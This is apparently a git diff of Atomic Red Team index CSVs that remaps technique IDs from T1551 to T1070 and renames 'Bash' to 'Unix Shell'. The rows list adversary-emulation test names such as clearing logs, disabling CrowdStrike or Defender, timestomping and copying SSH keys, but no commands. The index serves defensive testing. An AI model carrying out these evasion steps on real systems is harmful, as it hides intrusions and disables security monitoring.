+defense-evasion,T1070.004,File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
+defense-evasion,T1070.004,File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
+defense-evasion,T1070.004,File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
+defense-evasion,T1070.004,File Deletion,9,Delete-PrefetchFile,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
+defense-evasion,T1070.004,File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
defense-evasion,T1553.001,Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
defense-evasion,T1562.003,HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
@@ -284,7 +284,7 @@ defense-evasion,T1564.001,Hidden Files and Directories,6,Hide a Directory,b115ec
defense-evasion,T1564.001,Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
defense-evasion,T1564.002,Hidden Users,1,Hidden Users,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
-defense-evasion,T1551,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
+defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
defense-evasion,T1553.004,Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
@@ -326,9 +326,9 @@ defense-evasion,T1564.004,NTFS File Attributes,1,Alternate Data Streams (ADS),88
defense-evasion,T1564.004,NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
defense-evasion,T1564.004,NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
defense-evasion,T1564.004,NTFS File Attributes,4,Create ADS PowerShell,0045ea16-ed3c-4d4c-a9ee-15e44d1560d1,powershell
-defense-evasion,T1551.005,Network Share Connection Removal,1,Add Network Share,14c38f32-6509-46d8-ab43-d53e32d2b131,command_prompt
-defense-evasion,T1551.005,Network Share Connection Removal,2,Remove Network Share,09210ad5-1ef2-4077-9ad3-7351e13e9222,command_prompt
-defense-evasion,T1551.005,Network Share Connection Removal,3,Remove Network Share PowerShell,0512d214-9512-4d22-bde7-f37e058259b3,powershell
+defense-evasion,T1070.005,Network Share Connection Removal,1,Add Network Share,14c38f32-6509-46d8-ab43-d53e32d2b131,command_prompt
+defense-evasion,T1070.005,Network Share Connection Removal,2,Remove Network Share,09210ad5-1ef2-4077-9ad3-7351e13e9222,command_prompt
+defense-evasion,T1070.005,Network Share Connection Removal,3,Remove Network Share PowerShell,0512d214-9512-4d22-bde7-f37e058259b3,powershell
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
@@ -387,14 +387,14 @@ defense-evasion,T1036.006,Space after Filename,1,Space After Filename,89a7dd26-e
defense-evasion,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
-defense-evasion,T1551.006,Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
-defense-evasion,T1551.006,Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
-defense-evasion,T1551.006,Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
-defense-evasion,T1551.006,Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
-defense-evasion,T1551.006,Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
-defense-evasion,T1551.006,Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
-defense-evasion,T1551.006,Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
-defense-evasion,T1551.006,Timestomp,8,Windows - Timestomp a File,d7512c33-3a75-4806-9893-69abc3ccdd43,powershell
+defense-evasion,T1070.006,Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
+defense-evasion,T1070.006,Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
+defense-evasion,T1070.006,Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
+defense-evasion,T1070.006,Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
+defense-evasion,T1070.006,Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
+defense-evasion,T1070.006,Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
+defense-evasion,T1070.006,Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
+defense-evasion,T1070.006,Timestomp,8,Windows - Timestomp a File,d7512c33-3a75-4806-9893-69abc3ccdd43,powershell
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
@@ -528,8 +528,6 @@ discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26
discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d5711d6-655c-4a47-ae9c-6503c74fa877,powershell
execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh
execution,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
-execution,T1059.004,Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
-execution,T1059.004,Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1559.002,Dynamic Data Exchange,1,Execute Commands,f592ba2a-e9e8-4d62-a459-ef63abd819fd,manual
@@ -562,6 +560,8 @@ execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0
execution,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,powershell
+execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
+execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index 8552b91c..a59e81cd 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -35,25 +35,25 @@ credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-90
credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
-defense-evasion,T1551.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
-defense-evasion,T1551.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
-defense-evasion,T1551.003,Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
-defense-evasion,T1551.003,Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
-defense-evasion,T1551.003,Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
-defense-evasion,T1551.003,Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
-defense-evasion,T1551.003,Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
-defense-evasion,T1551.002,Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
-defense-evasion,T1551.002,Clear Linux or Mac System Logs,2,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
-defense-evasion,T1551.002,Clear Linux or Mac System Logs,3,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
+defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
+defense-evasion,T1070.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
+defense-evasion,T1070.003,Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
+defense-evasion,T1070.003,Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
+defense-evasion,T1070.003,Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
+defense-evasion,T1070.003,Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
+defense-evasion,T1070.003,Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
+defense-evasion,T1070.002,Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
+defense-evasion,T1070.002,Clear Linux or Mac System Logs,2,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
+defense-evasion,T1070.002,Clear Linux or Mac System Logs,3,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable iptables firewall,80f5e701-f7a4-4d06-b140-26c8efd1b6b4,sh
defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
defense-evasion,T1562.001,Disable or Modify Tools,4,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
-defense-evasion,T1551.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
-defense-evasion,T1551.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
-defense-evasion,T1551.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
-defense-evasion,T1551.004,File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
+defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
+defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
+defense-evasion,T1070.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
+defense-evasion,T1070.004,File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
defense-evasion,T1562.003,HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1564.001,Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
@@ -80,10 +80,10 @@ defense-evasion,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666
defense-evasion,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
-defense-evasion,T1551.006,Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
-defense-evasion,T1551.006,Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
-defense-evasion,T1551.006,Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
-defense-evasion,T1551.006,Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
+defense-evasion,T1070.006,Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
+defense-evasion,T1070.006,Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
+defense-evasion,T1070.006,Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
+defense-evasion,T1070.006,Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash
impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,bash
@@ -139,10 +139,10 @@ collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symme
collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
collection,T1113,Screen Capture,4,Import,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
-execution,T1059.004,Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
-execution,T1059.004,Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
+execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
+execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv
index fe36ae27..c4425a90 100644
--- a/atomics/Indexes/Indexes-CSV/macos-index.csv
+++ b/atomics/Indexes/Indexes-CSV/macos-index.csv
@@ -41,19 +41,19 @@ persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e
persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
-defense-evasion,T1551.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
-defense-evasion,T1551.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
-defense-evasion,T1551.003,Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
-defense-evasion,T1551.003,Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
-defense-evasion,T1551.003,Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
-defense-evasion,T1551.003,Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
-defense-evasion,T1551.002,Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
+defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
+defense-evasion,T1070.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
+defense-evasion,T1070.003,Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
+defense-evasion,T1070.003,Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
+defense-evasion,T1070.003,Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
+defense-evasion,T1070.003,Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
+defense-evasion,T1070.002,Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1562.001,Disable or Modify Tools,5,Disable Carbon Black Response,8fba7766-2d11-4b4a-979a-1e3d9cc9a88c,sh
defense-evasion,T1562.001,Disable or Modify Tools,6,Disable LittleSnitch,62155dd8-bb3d-4f32-b31c-6532ff3ac6a3,sh
defense-evasion,T1562.001,Disable or Modify Tools,7,Disable OpenDNS Umbrella,07f43b33-1e15-4e99-be70-bc094157c849,sh
defense-evasion,T1562.001,Disable or Modify Tools,8,Stop and unload Crowdstrike Falcon on macOS,b3e7510c-2d4c-4249-a33f-591a2bc83eef,sh
-defense-evasion,T1551.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
-defense-evasion,T1551.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
+defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
+defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1553.001,Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
defense-evasion,T1562.003,HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
@@ -83,10 +83,10 @@ defense-evasion,T1036.006,Space after Filename,1,Space After Filename,89a7dd26-e
defense-evasion,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
-defense-evasion,T1551.006,Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
-defense-evasion,T1551.006,Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
-defense-evasion,T1551.006,Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
-defense-evasion,T1551.006,Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
+defense-evasion,T1070.006,Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
+defense-evasion,T1070.006,Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
+defense-evasion,T1070.006,Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
+defense-evasion,T1070.006,Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash
impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,bash
@@ -119,12 +119,12 @@ discovery,T1016,System Network Configuration Discovery,3,System Network Configur
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh
-execution,T1059.004,Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
-execution,T1059.004,Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1569.001,Launchctl,1,Launchctl,6fb61988-724e-4755-a595-07743749d4e2,bash
execution,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
+execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
+execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,bash
command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,bash
command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83a49600-222b-4866-80a0-37736ad29344,bash
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 6c473702..a6c9df00 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -64,8 +64,8 @@ defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Tru
defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
-defense-evasion,T1551.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
-defense-evasion,T1551.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLogId,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
+defense-evasion,T1070.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
+defense-evasion,T1070.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLogId,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
@@ -94,16 +94,16 @@ defense-evasion,T1562.001,Disable or Modify Tools,20,Uninstall Crowdstrike Falco
defense-evasion,T1562.001,Disable or Modify Tools,21,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
-defense-evasion,T1551.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
-defense-evasion,T1551.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
-defense-evasion,T1551.004,File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
-defense-evasion,T1551.004,File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
-defense-evasion,T1551.004,File Deletion,9,Delete-PrefetchFile,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
-defense-evasion,T1551.004,File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
